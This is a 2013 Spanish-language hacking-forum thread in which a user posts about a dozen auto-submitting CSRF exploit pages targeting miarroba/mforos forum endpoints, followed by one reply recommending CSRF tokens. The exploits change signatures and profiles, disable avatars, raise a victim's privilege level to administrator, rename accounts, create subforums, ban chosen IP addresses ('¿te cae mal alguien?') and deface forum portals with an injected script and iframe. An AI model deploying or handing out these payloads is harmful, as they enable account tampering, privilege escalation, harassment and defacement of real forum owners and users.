CSRF'S miarroba forums [By Pekador]

  • 1 Respuestas
  • 2877 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter

CSRF'S miarroba forums [By Pekador]

  • en: Agosto 27, 2013, 09:39:34 am
Para cambiar la firma de cualquier foro [email protected]

Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://netpoison.mforos.com/options/" method=post name="csrf1">
<input type="hidden" name="firma" value="Underc0de.org">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">

-----------------------------------------------------------------------------------------------------

Este csrf se tarda mas en ejecutarlo ya que por cada palabra lo tienes que subir a un hosting distinto pero sigue valiendo, lo que ara es una vez que alla filtrado esa palabra se redirigira a el otro csrf y se filtraba y así sucesivamente es algo 'molesto' pero sigue valiendo!

lo que hace es filtrar palabras como 'hola' por la palabra que queramos.

Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/filtro_palabras.php?id=2099129" method=post name="csrf1">
<input type="hidden" name="original" value="hola">
<input type="hidden" name="filtrada" value="Underc0de.org">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">

<?php
header
('Location: otrocsrf.com');
?>

---------------------------------------------------------------------------------------------------------------------------

Con este csrf desactivas el avatar o la firma a cualquier usuario permanentemente asta que la vuelvan activar

Firma:


Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://netpoison.mforos.com/users/crackme/" method=post name="csrf1">
<input type="hidden" name="tabla_boton" value="Desactivar firma">
<body onload="envio_csrf()">


Avatares: 


Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://netpoison.mforos.com/users/crackme/" method=post name="csrf1">
<input type="hidden" name="boton" value="Desactivar avatares">
<body onload="envio_csrf()">

------------------------------------------------------------------------------------------------------------------------------

Con este csrf puedes elevarte los privilegios a administrador


Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://teamhackworld.mforos.com/users/crackme/" method=post name="csrf1">
<input type="hidden" name="nuevo_nivel" value="999">
<input type="hidden" name="accion" value="Cambiar nivel">
<body onload="envio_csrf()">

-------------------------------------------------------------------------------------------------------------------------------

Esta sirve para crear un subforo nuevo

Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/nuevo_subforo.php?id=2099129" method=post name="csrf1">
<input type="hidden" name="forotitulo" value="Underc0de.org">
<input type="hidden" name="forodesc" value="El mejor foro">
<input type="hidden" name="txp" value="100">
<input type="hidden" name="mxp" value="100">
<input type="hidden" name="activacode" value="no">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">

---------------------------------------------------------------------------------------------------------------------------

Este csrf cambia los datos generales de tu usuario de [email protected], tu nombre real, tu website, intereses, aficiones, firma etc

Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://privados.miarroba.es/#!new" method=post name="csrf1">
<input type="hidden" name="homepage" value="www.Underc0de.org">
<input type="hidden" name="nombre" value="Pekador">
<input type="hidden" name="apellidos" value="Revise su seguridad">
<input type="hidden" name="firma" value="Visita Underc0de">
<input type="hidden" name="descripcion" value="CSRF">
<input type="hidden" name="aficiones" value="Underc0de.org">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">

--------------------------------------------------------------------------------------------------------------------------

Estos de [email protected] tienen mas csrf en sus foros ..., aquí os dejo otro esta vez para banear por ip ¿te cae mal alguien y te sabes su ip? banealo de cualquier foro [email protected] ;D

para sacar la id del foro, poner /admin despues de la url: foro.mforos.com/admin

Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/baneo_ip.php?id=2099129&do=new" method=post name="csrf1">
<input type="hidden" name="text" value="Aquí la ip que quieran banear">
<input type="hidden" name="motivo" value="//**Underc0de.org**//">
<input type="hidden" name="time" value="30">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">

-------------------------------------------------------------------------------------------------------------------------------

Buenas aquí os dejo este csrf para [email protected] que sirve para cambiar la url del foro, entre otras cosas menos importantes :D

necesitaremos la id del foro, se consige poniendo /admin despues de la url del foro

Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/general.php?id=2099129" method=post name="csrf1">
<input type="hidden" name="titulo" value="Underc0de"> //
<input type="hidden" name="nombre" value=".org">
<input type="hidden" name="descripcion" value="Underc0de.org">
<input type="hidden" name="categoria" value="10">
<input type="hidden" name="tagsService[]" value="pwned">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">

-----------------------------------------------------------------------------------------------------------------------------------

Cambia el nombre de la cuenta de [email protected]

Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://miarroba.es/usuarios/modificar.php" method=post name="csrf1">
<input type="hidden" name="privacidad" value="registrados">
<input type="hidden" name="nick" value="Underc0de">
<input type="hidden" name="pais" value="12">
<input type="hidden" name="provincia" value="192">
<input type="hidden" name="zipcode" value="60155">
<input type="hidden" name="sexo" value="Hombre">
<input type="hidden" name="dia" value="5">
<input type="hidden" name="mes" value="11">
<input type="hidden" name="ano" value="1994">
<input type="hidden" name="boletin" value="si">
<input type="hidden" name="promos" value="si">
<input type="hidden" name="accion" value="update">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">

------------------------------------------------------------------------------------------------------------------------------------

Rara defacear el portal de cualquier foro de [email protected] claro que tenga el portal activado

Código: (php) [Seleccionar]
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/portal.php?id=2037885&seccion=crear_contenido&tipo=personalizado" method=post name="csrf1">
<input type="hidden" name="titulo" value="Pekador">
<input type="hidden" name="codigo" value="<script>document.documentElement.innerHTML='<iframe width=100% height=100% src=URL DEFACE>';</script>">
<input type="hidden" name="columna" value="2">
<input type="hidden" name="nivelmin" value="0">
<input type="hidden" name="nivelmax" value="0">
<input type="hidden" name="tipo" value="personalizado">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">

---------------------------------------------------------------------------------------------------------------------------------------

Reportado: Sí, pero el dueño no sabe fixearlas yo le ofrecí mi ayuda y la rechazo.

Y hay muchos mas, esto demuestra la seguridad de esos foro saludos y hasta la próxima.
« Última modificación: Agosto 27, 2013, 04:04:55 pm por Pekador »

Desconectado M5f3r0

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
  • Leer la firma.
  • Skype: m5f3r0
    • Ver Perfil

Re:CSRF'S miarroba forums [By Pekador]

  • en: Agosto 27, 2013, 04:50:32 pm
Excelente post compa, al dueño le haría bien colocar token para evitar los ataques CSRF's..

Saludos!
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)